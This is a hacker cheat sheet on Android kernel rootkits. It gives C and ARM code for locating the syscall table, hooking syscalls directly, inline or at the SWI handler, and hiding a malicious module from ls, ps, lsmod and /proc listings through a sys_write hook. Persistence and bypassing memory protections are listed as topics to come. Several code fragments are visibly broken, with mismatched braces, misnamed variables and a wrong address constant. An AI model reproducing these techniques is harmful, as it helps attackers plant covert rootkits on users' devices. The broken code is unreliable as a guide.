- Android LKM Cheat Shit -
...::: Porting old school LKM Tricks to Android Devices :::...
1.- References.
2.- Obtain syscall table address at runtime.
2.1.- System.map or kallsyms.
2.3.- Brute force search.
2.4.- Search through vector_swi.
3.- Hooking syscalls through syscall table and beyong.
3.1.- Direct.
3.2.- Inline.
3.3.- syscalls handler.
4.- Little tricks.
4.1.- Security through obscurity.
...::: Porting old school LKM Tricks to Android Devices :::...
1.- References.
www.thc.org/papers/LKM_HACKING.html
www.phrack.org/issues.html?issue=58&id=7#article
infocenter.arm.com
www.kernel.org
2.- Obtain syscall table address at runtime.
2.1.- System.map or kallsyms.
Kernel symbol table can be at /proc/kallsyms and maybe we could have
inside our target device the System.map file (or none of the above).
In both of them we'll find three fields: value,type and name.
01234567 R foobar
You can read about symbols types meanings at "man nm".
So, to get sys_call_table address we can use regular (kernel related) file
access methods.
#define TOLOWER(x) ((x) | 0x20)
#define LINE_SIZE 256
unsigned long *sys_call_table;
/* Adapted vsprintf.c/simple_strt[ou]ll
* hex string (without 0x) to unsigned long
* simple_strtoll not define/exported on some kernel versions
*/
unsigned long symbvalue_toul(const char *cp) {
unsigned long result = 0;
while (isxdigit(*cp)) {
unsigned int value;
value = isdigit(*cp) ? *cp - '0' : TOLOWER(*cp) - 'a' + 10;
if (value >= 16)
break;
result = result * 16 + value;
cp++;
}
return result;
}
static int sct_ffs(char *fname) {
struct file *fhandle;
char buffer[LINE_SIZE];
char *pointer;
char *line;
mm_segment_t oldfs;
int index;
oldfs = get_fs();
set_fs (KERNEL_DS);
fhandle = filp_open(fname, O_RDONLY, 0);
if ( IS_ERR(fhandle) || ( fhandle == NULL )) return -1;
memset(buffer, 0x00, LINE_SIZE);
pointer = buffer;
index = 0;
while (vfs_read(fhandle, pointer+index, 1, &fhandle->f_pos) == 1) {
if (pointer[index] == '\n' || index == 255) {
index = 0;
if ((strstr(pointer, "sys_call_table")) != NULL) {
line = kmalloc(LINE_SIZE, GFP_KERNEL);
if (line == NULL) {
filp_close(fhandle, 0);
set_fs(oldfs);
return -1;
}
memset(line, 0, LINE_SIZE);
strncpy(line, strsep(&pointer, " "), LINE_SIZE);
sys_call_table = (unsigned long *) symbvalue_toul(line);
kfree(line);
break;
}
}
index++;
}
filp_close(fhandle, 0);
set_fs(oldfs);
return 0;
}
Usually, we'll not find System.map file on our devices, because is not
essential for their correct operation, however kallsyms file will be
available on most of them (but probably this won't last forever).
So, we need more stable ways to find sys_call_table address without the
need for files.
2.3.- Brute force search.
On the other hand, on x86 Linux systems, we can search through two known
syscalls address, like loops_per_jiffy and boot_cpu_data syscalls.
But again, we can't ensure that syscall table address will be located
between two known functions along differente releases (linux x86 either).
So, maybe the least bad solution could be scan the entire kernel space
range (I know, I know, but i said 'the least bad', but still working on
ARM systems).
First, we need to know start and end addresses.
# grep " _text\| _etext" /proc/kallsyms
c0026000 T _text
c02f6000 A _etext
#define KSTART 0xc000000
#define KENDS 0xd000000
unsigned long *sys_call_table;
static int sct_brutus(void) {
unsigned long **potentially;
unsigned long index;
for (index=KSTART; index<KENDS; index += sizeof(void *))
potentially = (unsigned long **) index;
if (potentially[__NR_kill] == (unsigned long *)sys_kill) {
return &potentially[0];
}
}
return 0;
}
2.4.- Search through vector_swi.
Well, now a bit more seriously method.
Looking at arch/arm/kernel/entry-common.S we'll see that sys_call_table
address is loaded into vector_swi and into sys_syscall procedures.
ENTRY(vector_swi)
sub sp, sp, #S_FRAME_SIZE
stmia sp, {r0 - r12} @ Calling r0 - r12
add r8, sp, #S_PC
stmdb r8, {sp, lr}^ @ Calling sp, lr
mrs r8, spsr @ called from non-FIQ mode, so ok.
str lr, [sp, #S_PC] @ Save calling PC
str r8, [sp, #S_PSR] @ Save CPSR
str r0, [sp, #S_OLD_R0] @ Save OLD_R0
zero_fp
[... more stuff here ...]
get_thread_info tsk
adr tbl, sys_call_table @ load syscall table pointer
ldr ip, [tsk, #TI_FLAGS] @ check for syscall tracing
[... more stuff here ...]
sys_syscall:
bic scno, r0, #__NR_OABI_SYSCALL_BASE
cmp scno, #__NR_syscall - __NR_SYSCALL_BASE
cmpne scno, #NR_syscalls @ check range
stmloia sp, {r5, r6} @ shuffle args
movlo r0, r1
movlo r1, r2
movlo r2, r3
movlo r3, r4
ldrlo pc, [tbl, scno, lsl #2]
; tbl = sys_call_table
; scno = syscall number
b sys_ni_syscall
ENDPROC(sys_syscall)
0k, vector_swi is called by SWI instruction (Software Interrupt), and
interrupt calls addresses are defined in the vector table.
RTFM-ing ARM specifications, we can know fixed vector table addresses,
vector_swi is at 0x00000008 or 0xffff0008.
Exception Type Normal Address High Vector Address
-------------- -------------- -------------------
Reset 0x00000000 0xFFFF0000
Undefined Inst. 0x00000004 0xFFFF0004
Software Inter. 0x00000008 0xFFFF0008
Prefetch Abort 0x0000000C 0xFFFF000C
Data Abort 0x00000010 0xFFFF0010
IRQ 0x00000018 0xFFFF0018
FIQ 0x0000001C 0xFFFF001C
In short, we'll need to do:
Read 0xffff0008: LDR PC, vector_swi and get vector_swi offset.
Search within vector_swi, the adr tbl, sys_call_table instruction.
Extract the sys_call_table address.
And this is:
unsigned long *sys_call_table;
int sct_swi(void) {
const void *vSWI_LDR_addr = 0xFFFF0008;
unsigned long* ptr;
unsigned long vSWI_offset;
unsigned long vSWI_instruction;
unsigned long *vt_vSWI;
unsigned long sct_offset;
int isAddr;
vSWI_instruction = vSWI_offset = sct_offset = 0;
ptr = vtable_vSWI = NULL;
memcpy(&vSWI_instruction, vSWI_LDR_addr, sizeof(vSWI_instruction));
vSWI_offset = veSWI_instruction & (unsigned long)0x00000fff;
vt_vSWI = (unsigned long *) ((unsigned long)vSWI_addr+vSWI_offset+8);
ptr=*vt_vSWI;
isAddr = 0;
while (!isAddr) {
isAddr = ( ((*ptr) & ((unsigned long)0xffff0000)) == 0xe28f0000 );
if (isAddr) {
sct_offset = (*ptr) & ((unsigned long)0x00000fff);
sys_call_table = (unsigned long)ptr + 8 + sct_offset;
}
ptr++;
}
return 0;
}
3.- Hooking syscalls through syscall table and beyong.
3.1.- Direct.
The basic way to hook any system call is modifying directly the
sys_call_table.
Set:
open_original = sys_call_table[__NR_open];
sys_call_table[__NR_open] = new_open;
Unset:
sys_call_table[__NR_open] = open_original;
Nothing more to say, easy to do, easy to detect.
3.2.- Inline.
Instead of set ours addresses into sys_call_table, we can also add one
branch instruction directly into the syscalls and make that they goes to
our functions.
Set:
open_original = sys_call_table[__NR_open];
memcpy(original_bytes, open_original, 4);
branch = (unsigned char*)open_original;
// -1 for pipeline
delta = ((new_open - (open_original + 4)) >> 2) - 1;
if (delta < 0)
delta = delta | 0xFF000000;
*(branch + 3) = 0xEA;
*(branch + 2) = (delta >> 16) & 0xFF;
*(branch + 1) = (delta >> 8) & 0xFF;
*branch = delta & 0xFF;
Unset:
memcpy(open_original, original_bytes, 4);
Perfect, again easy to do, and easiest to detect.
When I say that is easy to detect, I'm thinking in sys_call_table and
syscalls contents checksum.
3.3.- syscalls handler.
And now, one step back, two steps forward.
Systems calls are implemented through Software traps (swi instruction),
and when swi instruction is called (among other things), CPU does
PC = 0xFFFF0008 on hight-vector systems like Android or PC = 0x08 on
low-vector systems.
Vector table:
arch/arm/kernel/entry-armv.S
.globl __vectors_start
__vectors_start:
swi SYS_ERROR0
b vector_und + stubs_offset
ldr pc, .LCvswi + stubs_offset
b vector_pabt + stubs_offset
b vector_dabt + stubs_offset
b vector_addrexcptn + stubs_offset
b vector_irq + stubs_offset
b vector_fiq + stubs_offset
.globl __vectors_end
__vectors_end:
So every system call is handled by vector_swi procedure. To hook any, we
can patch vector_swi in our own way.
NOTE: Looking into 'arch/arm/kernel/entry-common.S', you will see the
sys_syscall entry, that also seems to control syscall calls, but in some
systems is defined as obsolete (choose your option, patch vector_swi,
sys_syscall or both or them).
4.- Little trick of the week.
We can't cover more than one decade of LKM tips and tricks, it
could be a great theme for future researchs, but for this cheat shit,
hooking only one syscall, we can hidde our LKM from ls, ps, lsmod, dmesg,
/proc/modules, /proc/kallsyms, etc...
Obviously we are talking about sys_write
if (strstr(buf, OUREGO)) {
return count;
} else {
return orig_write(fd, buf, count);
}
audran@SaltLakeCity: $ ./adb shell ls /data/local | grep basic1
audran@SaltLakeCity: $ ./adb shell lsmod | grep basic1
audran@SaltLakeCity: $ ./adb shell ps | grep basic1
audran@SaltLakeCity: $ ./adb shell cat /proc/modules | grep basic1
audran@SaltLakeCity: $ ./adb shell cat /proc/kallsyms | grep basic1
More seriously way to do this, maybe hooking getdents64, read, write, kill,
and patching linked list of loaded modules.
So Still waiting.
to come:
- Persistence (Infections).
- Bypass memory RDONLY protections.
- Proof of Concept
Kind Regards!
- Eugenio Delfa -